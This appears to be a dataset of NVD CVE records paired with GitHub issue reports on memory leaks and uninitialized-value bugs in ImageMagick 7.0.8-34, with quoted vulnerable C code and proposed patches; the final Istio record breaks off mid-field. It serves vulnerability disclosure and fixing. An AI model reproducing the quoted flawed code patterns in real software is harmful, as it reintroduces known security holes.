[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1517
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a possible but rare memory leak in function `WriteDPXImage` in coders/dpx.c. ``` pixels=(unsigned char *) GetQuantumPixels(quantum_info); for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,exception); if (p == (const Quantum *) NULL) break; (void) ExportQuantumPixels(image,(CacheView *) NULL,quantum_info, quantum_type,pixels,exception); count=WriteBlob(image,extent,pixels); if (count != (ssize_t) extent) break; status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } quantum_info=DestroyQuantumInfo(quantum_info); (void) CloseBlob(image); return(status); ``` We should call `ThrowWriterException(CorruptImageError,"UnableToWriteImageData");` when condition `y < (ssize_t) image->rows` satisfies behind for-loop. See commit https://github.com/ImageMagick/ImageMagick/commit/f1cc2eb986dc8f4a7727bce689a17566f896fde6 for more details.
Possible but rare memory leak in function WriteDPXImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1517/comments
2
2019-03-21T06:25:46Z
2019-06-27T01:29:21Z
https://github.com/ImageMagick/ImageMagick/issues/1517
423,586,613
1,517
440
CVE-2019-12976
2019-06-26T18:15:10.277
ImageMagick 7.0.8-34 has a memory leak in the ReadPCLImage function in coders/pcl.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1520" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1520" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1520
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a memory leak in function ReadPCLImage in coders/pcl.c. ``` (void) FormatLocaleString(geometry,MagickPathExtent,"%.20gx%.20g",(double) page.width,(double) page.height); if (image_info->monochrome != MagickFalse) delegate_info=GetDelegateInfo("pcl:mono",(char *) NULL,exception); else if (cmyk != MagickFalse) delegate_info=GetDelegateInfo("pcl:cmyk",(char *) NULL,exception); else delegate_info=GetDelegateInfo("pcl:color",(char *) NULL,exception); if (delegate_info == (const DelegateInfo *) NULL) return((Image *) NULL); ``` We should call `DestroyImage` before return statement. ``` if (delegate_info == (const DelegateInfo *) NULL) - return((Image *) NULL); + { + image=DestroyImage(image); + return((Image *) NULL); + } ```
Memory leak in function ReadPCLImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1520/comments
2
2019-03-21T07:25:10Z
2019-06-27T01:29:46Z
https://github.com/ImageMagick/ImageMagick/issues/1520
423,598,777
1,520
441
CVE-2019-12977
2019-06-26T18:15:10.323
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the WriteJP2Image function in coders/jp2.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1518" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1518" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/ImageMagick/ImageMagick/issues/1518
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There a use-of-uninitialized-value vulnerability in function WriteJP2Image in coders/jp2.c. ``` if (image_info->extract != (char *) NULL) { RectangleInfo geometry; int flags; /* Set tile size. */ flags=ParseAbsoluteGeometry(image_info->extract,&geometry); parameters.cp_tdx=(int) geometry.width; parameters.cp_tdy=(int) geometry.width; if ((flags & HeightValue) != 0) parameters.cp_tdy=(int) geometry.height; if ((flags & XValue) != 0) parameters.cp_tx0=geometry.x; if ((flags & YValue) != 0) parameters.cp_ty0=geometry.y; parameters.tile_size_on=OPJ_TRUE; } ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/jp2.c#L853 We should call `(void) memset(&geometry,0,sizeof(geometry));` after declaration. See https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6441, https://github.com/ImageMagick/ImageMagick/commit/eeb68ee77dfb2b508284e4ea7d49e8b807d32783 and 81bfff2759854654bf07e452bf3b9b329f3c55e5 for detail.
Use-of-uninitialized-value in function WriteJP2Image
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1518/comments
4
2019-03-21T06:44:34Z
2019-06-27T01:30:10Z
https://github.com/ImageMagick/ImageMagick/issues/1518
423,590,022
1,518
442
CVE-2019-12978
2019-06-26T18:15:10.370
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1519" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1519" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/ImageMagick/ImageMagick/issues/1519
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There a use-of-uninitialized-value vulnerability in function ReadPANGOImage in coders/pango.c. ``` assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickCoreSignature); if (image_info->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s", image_info->filename); assert(exception != (ExceptionInfo *) NULL); assert(exception->signature == MagickCoreSignature); image=AcquireImage(image_info,exception); (void) ResetImagePage(image,"0x0+0+0"); ``` https://github.com/ImageMagick/ImageMagick/blob/master/coders/pango.c#L179 We should call `SetImageBackgroundColor` when condition `image->columns !=0 && image->rows !=0` satisfies. Otherwise, there will be a use-of-unintialized-value vulnerablity. See https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=11930, https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6616, https://github.com/ImageMagick/ImageMagick/commit/18df5773b5efbd2c9dc54c9caa021febf486bd22 and https://github.com/ImageMagick/ImageMagick/commit/f1fb7816a60c7c68d7ac037975c5aa95b6dcf8dd for more details.
Use-of-uninitialized-value in function ReadPANGOImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1519/comments
2
2019-03-21T06:54:58Z
2019-06-27T01:30:41Z
https://github.com/ImageMagick/ImageMagick/issues/1519
423,592,141
1,519
443
CVE-2019-12979
2019-06-26T18:15:10.417
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1522" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1522" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/ImageMagick/ImageMagick/issues/1522
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is an issue in function SyncImageSettings in MagickCore/image.c. The issue is similar to https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6385 which was fixed in https://github.com/ImageMagick/ImageMagick/commit/56a19e7ae07f40299f3afd4994d690f2c9b81993. ``` if (image_info->density != (char *) NULL) { GeometryInfo geometry_info; flags=ParseGeometry(image_info->density,&geometry_info); image->resolution.x=geometry_info.rho; image->resolution.y=geometry_info.sigma; if ((flags & SigmaValue) == 0) image->resolution.y=image->resolution.x; } ``` Below is the proposal patch. ``` - image->resolution.x=geometry_info.rho; - image->resolution.y=geometry_info.sigma; - if ((flags & SigmaValue) == 0) - image->resolution.y=image->resolution.x; + if ((flags & RhoValue) != 0) + image->resolution.x=geometry_info.rho; + image->resolution.y=image->resolution.x; + if ((flags & SigmaValue) != 0) + image->resolution.y=geometry_info.sigma; ```
Use-of-uninitialized-value in function SyncImageSettings.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1522/comments
5
2019-03-21T11:58:29Z
2019-08-10T06:30:27Z
https://github.com/ImageMagick/ImageMagick/issues/1522
423,694,012
1,522
444
CVE-2019-12995
2019-06-28T10:15:11.487
Istio before 1.2.2 mishandles certain access tokens, leading to "Epoch 0 terminated with an error" in Envoy. This is related to a jwt_authenticator.cc segmentation fault.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 